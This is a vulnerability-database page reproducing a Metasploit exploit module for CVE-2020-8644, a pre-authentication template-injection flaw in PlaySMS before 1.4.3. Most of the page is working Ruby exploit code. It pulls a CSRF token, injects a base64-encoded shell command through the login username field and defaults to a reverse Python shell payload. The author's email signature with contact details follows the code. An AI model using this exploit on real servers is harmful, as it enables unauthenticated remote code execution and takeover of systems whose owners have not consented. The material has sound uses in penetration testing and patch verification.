Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

PlaySMS 1.4.3 - Template Injection / Remote Code Execution

🗓️ 11 Mar 2020 00:00:00Reported by Touhid M.ShaikhType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 210 Views

PlaySMS 1.4.3 Pre Auth Template Injection Remote Code Executio

Related
Code
ReporterTitlePublishedViews
Family
0day.today		PlaySMS Unauthenticated Template Injection Code Execution Exploit
6 Apr 202000:00
zdt
ATTACKERKB		CVE-2020-8644
5 Feb 202000:00
attackerkb
Circl		CVE-2020-8644
3 Apr 202014:31
circl
CISA KEV Catalog		PlaySMS Server-Side Template Injection Vulnerability
3 Nov 202100:00
cisa_kev
CNVD		Unspecified Vulnerability in PlaySMS
11 Feb 202000:00
cnvd
Check Point Advisories		PlaySMS index.php Remote Code Execution (CVE-2020-8644)
16 Nov 202100:00
checkpoint_advisories
CVE		CVE-2020-8644
5 Feb 202021:03
cve
Cvelist		CVE-2020-8644
5 Feb 202021:03
cvelist
Exploit DB		PlaySMS - index.php Unauthenticated Template Injection Code Execution (Metasploit)
16 Apr 202000:00
exploitdb
Metasploit		PlaySMS index.php Unauthenticated Template Injection Code Execution
3 Apr 202014:21
metasploit
Rows per page
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
    Rank = ExcellentRanking
    include Msf::Exploit::Remote::HttpClient

    def initialize(info = {})
        super(update_info(info,
        'Name' => 'PlaySMS 1.4.3 Pre Auth Template Injection Remote Code
Execution',
        'Description' => %q{
            This module exploits a Preauth Server-Side Template Injection
leads remote code execution vulnerability in PlaySMS Before Version 1.4.3.
            This issue is caused by Double processes a server-side template
by Custom PHP Template system called 'TPL'.
            which is used in PlaySMS template engine location
src/Playsms/Tpl.php:_compile(). When Attacker supply username with a
malicious payload
            and submit. This malicious payload first process by TPL and
save the value in the current template after this value goes for the second
process
            which result in code execution.
            The TPL(https://github.com/antonraharja/tpl) template language
is vulnerable to PHP code injection.

            This module was tested against PlaySMS 1.4 on HackTheBox's
Forlic Machine.
        },
        'Author' =>
          [
            'Touhid M.Shaikh <touhidshaikh22[at]gmail.com>', # Metasploit
Module
            'Lucas Rosevear' # Found and Initial PoC by NCC Groupd
          ],
        'License' => MSF_LICENSE,
        'References' =>
          [
            ['CVE','2020-8644'],
            ['URL','
https://research.nccgroup.com/2020/02/11/technical-advisory-playsms-pre-authentication-remote-code-execution-cve-2020-8644/
']
          ],
        'DefaultOptions' =>
          {
            'SSL'     => false,
            'PAYLOAD' => 'cmd/unix/reverse_python'
          },
        'Privileged' => false,
        'Platform'   => %w[unix linux],
        'Arch'       => ARCH_CMD,
        'Payload'        =>
        {
          'Compat' =>
            {
              'PayloadType' => 'cmd',
              'RequiredCmd' => 'python'
            }
        },
        'Targets' =>
          [
            [ 'PlaySMS Before 1.4.3', { } ],
          ],
        'DefaultTarget'  => 0,
        'DisclosureDate' => 'Feb 05 2020'))

      register_options(
        [
          OptString.new('TARGETURI', [ true, "Base playsms directory path",
'/']),
        ])
    end

    def uri
      return target_uri.path
    end

    def check
      begin
        res = send_request_cgi({
          'method' => 'GET',
          'uri' => normalize_uri(uri, 'index.php')
        })
      rescue
        vprint_error('Unable to access the index.php file')
        return CheckCode::Unknown
      end

      if res.code == 302 &&
res.headers['Location'].include?('index.php?app=main&inc=core_auth&route=login')
        return Exploit::CheckCode::Appears
      end

      return CheckCode::Safe
    end

    #Send Payload in Login Request
    def login
      res = send_request_cgi({
        'uri' => normalize_uri(uri, 'index.php'),
        'method' => 'GET',
        'vars_get' => {
          'app' => 'main',
          'inc' => 'core_auth',
          'route' => 'login',
        }
      })

      # Grabbing CSRF token from body
      /name="X-CSRF-Token" value="(?<csrf>[a-z0-9"]+)">/ =~ res.body
      fail_with(Failure::UnexpectedReply, "#{peer} - Could not determine
CSRF token") if csrf.nil?
      vprint_good("X-CSRF-Token for login : #{csrf}")

      cookies = res.get_cookies

      vprint_status('Trying to Send Payload in Username Field ......')

      #Encoded in base64 to avoid HTML TAGS which is filter by Application.
      evil = "{{`printf #{Rex::Text.encode_base64(payload.encode)}|base64
-d |sh`}}"

      # Send Payload with cookies.
      res = send_request_cgi({
        'method' => 'POST',
        'uri' => normalize_uri(uri, 'index.php'),
        'cookie' => cookies,
        'vars_get' => Hash[{
          'app' => 'main',
          'inc' => 'core_auth',
          'route' => 'login',
          'op' => 'login',
        }.to_a.shuffle],
        'vars_post' => Hash[{
          'X-CSRF-Token' => csrf,
          'username' => evil,
          'password' => ''
        }.to_a.shuffle],
      })

      fail_with(Failure::UnexpectedReply, "#{peer} - Did not respond to
Login request") if res.nil?

      # Request Status Check
      if res.code == 302
        print_good("Payload successfully Sent")
        return cookies
      else
        fail_with(Failure::UnexpectedReply, "#{peer} - Something Goes
Wrong")
      end
    end

    def exploit
      cookies = login
      vprint_status("Cookies here : #{cookies}")
      # Execute Last Sent Username.
      res = send_request_cgi({
        'uri' => normalize_uri(uri, 'index.php'),
        'method' => 'GET',
        'cookie' => cookies,
        'vars_get' => {
          'app' => 'main',
          'inc' => 'core_auth',
          'route' => 'login',
        }
      })
    end
end

-- 
Touhid Shaikh
Exploit Researcher and Developer | Security Consultant
m: +91 7738794435
e: [email protected]
www.touhidshaikh.com [image: Facebook icon]
<https://www.facebook.com/tauheeds1> [image: LinkedIn icon]
<https://www.linkedin.com/in/touhidshaikh22/> [image: Twitter icon]
<https://twitter.com/touhidshaikh22> [image: Youtube icon]
<https://www.youtube.com/touhidshaikh22>

The content of this email is confidential and intended for the recipient
specified in message only. It is strictly forbidden to share any part of
this message with any third party, without a written consent of the sender.
If you received this message by mistake, please reply to this message and
follow with its deletion, so that we can ensure such a mistake does not
occur in the future.

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
11 Mar 2020 00:00Current
9.8High risk
Vulners AI Score9.8
CVSS 27.5
CVSS 3.19.8
EPSS0.94062
SSVC
playsmstemplate injectionremote code executionserver-sidevulnerabilitypre-authenticationphphacktheboxcmdunixlinuxcsrfbase64
210